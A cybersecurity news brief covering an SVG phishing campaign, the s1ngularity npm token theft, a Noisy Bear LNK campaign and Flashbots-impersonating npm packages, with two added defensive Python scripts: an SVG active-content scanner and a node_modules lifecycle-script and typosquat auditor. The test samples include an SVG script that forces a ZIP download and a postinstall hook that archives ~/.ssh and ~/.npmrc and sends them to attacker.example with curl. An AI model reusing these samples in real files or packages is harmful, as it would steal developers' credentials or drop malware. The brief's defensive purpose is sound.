Svoboda Cybersecurity Brief September 07, 2025
SVG Phishing Campaign Targets Colombian Government with Malware-Laden Files
VirusTotal identified a phishing campaign that uses SVG files to impersonate Colombia’s judicial system and deliver malware through password-protected ZIP archives. The SVGs abuse the <foreignObject> element to embed HTML and JavaScript, so a file that looks like an image renders a fake portal page and triggers the download. The files evaded traditional antivirus detection and were surfaced by VirusTotal’s AI-based Code Insight feature, which linked more than 500 previously undetected SVG files to the campaign.
Impact: The ZIP pairs a legitimate executable with a malicious DLL that it sideloads, giving the attackers code execution on the victim’s system.
Mitigation: Treat SVG as active content rather than as an image: block or quarantine SVG attachments at the mail gateway, inspect inbound SVGs for <script>, <foreignObject> and on* event-handler attributes, train users to question unexpected downloads, and alert on password-protected ZIP archives arriving via browser downloads.
Source: BleepingComputer
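Added example (not code from the brief, VirusTotal or BleepingComputer): a small Python scanner that flags the SVG constructs this campaign relied on, so SVG attachments can be triaged instead of blanket-blocked. It parses the XML and reports <script> and <foreignObject> elements, on* event handlers, javascript: URLs, and large base64 blobs of the kind an embedded ZIP would leave behind. The tag list, the 200-character blob threshold and the two sample files are assumptions constructed for the example, not campaign artifacts.

```python
# Added example for this brief, not code from VirusTotal or the campaign.
# Static scanner for SVG files that carry active content: <script>,
# <foreignObject> (HTML/JavaScript smuggled inside the image), event-handler
# attributes, javascript: URLs and large base64 blobs where an embedded ZIP
# would sit. Tag list, blob threshold and sample files are assumptions.
import base64
import re
import sys
import xml.etree.ElementTree as ET

# Elements that let an SVG execute or embed code when rendered in a browser.
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object"}
JS_URL = re.compile(r"^\s*javascript:", re.I)
# 200+ base64 characters in one text node is far more than normal SVG markup needs.
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")


def _local(qname: str) -> str:
    """'{http://www.w3.org/2000/svg}foreignObject' -> 'foreignobject'."""
    return qname.rsplit("}", 1)[-1].lower()


def scan_svg(data: bytes) -> list[str]:
    """Return the list of findings for one SVG document (empty means clean).

    xml.etree is used for brevity; in production parse untrusted XML with
    defusedxml to avoid entity-expansion attacks.
    """
    findings = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        # Browsers are more forgiving than XML parsers; a file our parser
        # rejects must not slip through as "no findings".
        return [f"unparseable-xml: {exc}"]
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.append(f"element:{tag}")
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.startswith("on"):                    # onload=, onclick=, ...
                findings.append(f"event-handler:{name}")
            if name == "href" and JS_URL.match(value):   # href= and xlink:href=
                findings.append("javascript-url")
        if el.text and BASE64_BLOB.search(el.text):
            findings.append(f"base64-blob:{tag}")
    return findings


# Constructed samples (not campaign artifacts). BENIGN is a plain drawing;
# MALICIOUS mirrors the structure the brief describes: HTML inside
# <foreignObject> and a script that turns an embedded base64 ZIP into a download.
BENIGN = b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10"><circle r="5"/></svg>'

FAKE_ZIP = base64.b64encode(b"PK\x03\x04" + b"\x00" * 200)   # ZIP magic + padding
MALICIOUS = (
    b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
    b'<foreignObject width="100%" height="100%">'
    b'<body xmlns="http://www.w3.org/1999/xhtml"><script>'
    b'var z="' + FAKE_ZIP + b'";var a=document.createElement("a");'
    b'a.href="data:application/zip;base64,"+z;a.download="Citacion.zip";a.click();'
    b'</script></body></foreignObject>'
    b'<a xlink:href="javascript:void(0)" onclick="go()"/></svg>'
)

if __name__ == "__main__":
    # Scan files given on the command line, or the built-in samples.
    paths = sys.argv[1:]
    if not paths:
        for label, blob in (("benign", BENIGN), ("malicious", MALICIOUS)):
            print(label, scan_svg(blob) or "clean")
    for p in paths:
        with open(p, "rb") as fh:
            print(p, scan_svg(fh.read()) or "clean")
```

Any non-empty result is grounds to quarantine the attachment; a clean result only means none of these constructs were found, so the scanner belongs in front of, not instead of, the gateway policy above.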
NPM “s1ngularity” Attack Leaks GitHub Tokens and Secrets via AI-Powered Malware
Malicious versions of the Nx build-system packages on npm carried a post-install script that harvested GitHub tokens, SSH keys and cryptocurrency wallets, and that drove locally installed AI command-line tools (Claude, Gemini) to locate further credentials on the host. The attack ran in three phases, one of which used the stolen tokens to flip victims’ private repositories to public, and exposed 2,180 accounts and 7,200 repositories.
Impact: Widespread exposure of developer secrets; any leaked token that has not yet been revoked remains usable by the attackers.
Mitigation: Revoke and rotate every leaked token and key, enforce 2FA, install dependencies with lifecycle scripts disabled where the build allows it (npm install --ignore-scripts), adopt npm’s Trusted Publisher model, and audit GitHub Actions workflows and the credentials they can reach.
Source: BleepingComputer
Noisy Bear Targets Kazakhstan Energy Sector with BarrelFire Phishing Campaign
The Russia-linked Noisy Bear group targeted Kazakhstan’s state oil and gas company KazMunaiGas with phishing emails carrying malicious LNK shortcut files that launch the DOWNSHELL PowerShell loader, which in turn deploys a DLL implant. The lures mimicked internal company communications, and the infrastructure was hosted with the Aeza Group bulletproof hosting provider.
Impact: Reconnaissance of the compromised host and a reverse shell that gives the operators a foothold for follow-on exploitation.
Mitigation: Block or strip LNK attachments at the mail gateway, alert on DLL sideloading by otherwise legitimate binaries, and restrict PowerShell execution (Constrained Language Mode, script block logging, application control).
Source: TheHackerNews
Malicious npm Packages Impersonate Flashbots to Steal Ethereum Wallet Keys
Four npm packages, among them @flashbotts/ethers-provider-bundle, impersonated the Flashbots SDKs and exfiltrated Ethereum private keys and mnemonic seed phrases through Telegram bots. One of the packages also redirected unsigned transactions to attacker-controlled wallets.
Impact: Irreversible theft of cryptocurrency, since on-chain transfers cannot be clawed back.
Mitigation: Audit npm dependencies for lookalike scopes and names, verify the publisher behind each package before installing it, and monitor wallets for unauthorized activity.
Source: TheHackerNews
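Added example covering both npm items in this brief (the s1ngularity post-install script and the Flashbots lookalike packages); it is not code from Nx, Flashbots, npm or the cited reports. The Python script audits an installed node_modules tree for the two things those items describe: packages that run commands at install time through lifecycle scripts, and package scopes or names within a couple of characters of trusted ones (@flashbotts vs @flashbots). The trusted list, the suspicious-command heuristics, the hypothetical build-telemetry package and the whole sample tree are assumptions constructed for the example.

```python
# Added example for this brief, not code from Nx, Flashbots, npm or the
# cited reports. Audits an installed node_modules tree for packages that run
# commands at install time (lifecycle scripts, the channel the s1ngularity
# payload used) and for scopes/names that imitate trusted ones (@flashbotts
# vs @flashbots). Trusted list, heuristics and sample tree are assumptions.
import json
import re
import tempfile
from pathlib import Path

# Hooks npm runs automatically when a dependency is installed from the registry.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# Fragments that seldom belong in a legitimate build step (assumed heuristic list).
SUSPICIOUS = re.compile(r"curl|wget|base64|\.bashrc|\.zshrc|\.npmrc|\.ssh|/tmp/|eval\(", re.I)
# Scopes and names this project trusts (assumed allowlist for the example).
TRUSTED = ("@flashbots", "@nx", "nx", "lodash")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike(name: str, trusted=TRUSTED):
    """Return the trusted scope/name that `name` imitates, or None.

    A scoped package is judged by its scope (the part npm ties to a publisher),
    an unscoped one by its full name. Exact matches are trusted, not flagged.
    """
    candidate = name.split("/")[0] if name.startswith("@") else name
    if candidate in trusted:
        return None
    for t in trusted:
        if 0 < edit_distance(candidate, t) <= 2:
            return t
    return None


def iter_packages(node_modules: Path):
    """Yield package.json contents for every installed package, scoped and nested included."""
    for entry in sorted(node_modules.iterdir()):
        dirs = sorted(entry.iterdir()) if entry.name.startswith("@") else [entry]
        for d in dirs:
            pj = d / "package.json"
            if pj.is_file():
                yield json.loads(pj.read_text(encoding="utf-8"))
                if (d / "node_modules").is_dir():          # nested dependency trees
                    yield from iter_packages(d / "node_modules")


def audit(node_modules) -> list[tuple]:
    """Return (name, version, issue, severity, detail) for every finding."""
    findings = []
    for pkg in iter_packages(Path(node_modules)):
        name, version = pkg.get("name", "?"), pkg.get("version", "?")
        for hook in INSTALL_HOOKS:
            cmd = pkg.get("scripts", {}).get(hook)
            if cmd:
                sev = "high" if SUSPICIOUS.search(cmd) else "review"
                findings.append((name, version, f"lifecycle:{hook}", sev, cmd))
        imitated = lookalike(name)
        if imitated:
            findings.append((name, version, "lookalike", "high", f"resembles trusted {imitated}"))
    return findings


def build_sample_tree(root) -> Path:
    """Write a constructed node_modules tree: a clean package, a hypothetical
    package with a secret-harvesting postinstall, and one under a lookalike scope."""
    samples = {
        "left-pad": {"name": "left-pad", "version": "1.3.0"},
        "build-telemetry": {
            "name": "build-telemetry", "version": "0.1.0",
            "scripts": {"postinstall": "node install.js; tar cz ~/.ssh ~/.npmrc | base64 | curl -d @- http://attacker.example/up"},
        },
        "@flashbotts/ethers-provider-bundle": {"name": "@flashbotts/ethers-provider-bundle", "version": "1.0.0"},
    }
    nm = Path(root) / "node_modules"
    for name, pj in samples.items():
        (nm / name).mkdir(parents=True)
        (nm / name / "package.json").write_text(json.dumps(pj), encoding="utf-8")
    return nm


def demo() -> list[tuple]:
    """Build the sample tree in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit(build_sample_tree(tmp))


if __name__ == "__main__":
    for f in demo():
        print(*f, sep=" | ")
```

Run audit() against a real node_modules after a lockfile review; every "lifecycle" finding is a package that executes code on the developer's machine at install time and deserves a look even at "review" severity, and a "lookalike" finding should be resolved by checking the publisher on the registry rather than by the name alone.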
Share this brief: https://svo.bz/4zcp